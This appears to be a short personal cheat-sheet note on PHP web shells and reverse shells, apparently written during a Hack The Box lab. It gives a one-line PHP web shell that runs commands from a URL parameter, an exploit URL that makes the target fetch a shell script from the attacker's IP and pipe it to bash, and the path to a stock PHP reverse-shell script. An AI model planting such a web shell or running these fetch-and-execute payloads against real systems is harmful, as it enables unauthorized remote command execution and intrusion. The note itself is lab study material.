#php #reverseShell ## #One-liner ```PHP <?php system($_GET["cmd"]); ?> ``` Can be accessed by navigating to file location on vulnerable #webserver Start [[NetCat Listener]] to exploit #reverseShell Use #python3 to create #webserver and then expolit php and #curl file from local webserver and pipe it to bash ```shell http://thetoppers.htb/shell.php?cmd=curl%20<YOUR_IP_ADDRESS>:8000/shell.sh|bash ``` #reverseShell php-reverse-shell.php - Located at /usr/share/webshell/php ## File Operations ![[Code File Transfers#PHP Download]] ## Web Server ![[Linux File Transfers#Linux - Creating a Web Server with PHP]] ## Scripts ![[Useful File Locations#PHP#Scripts]]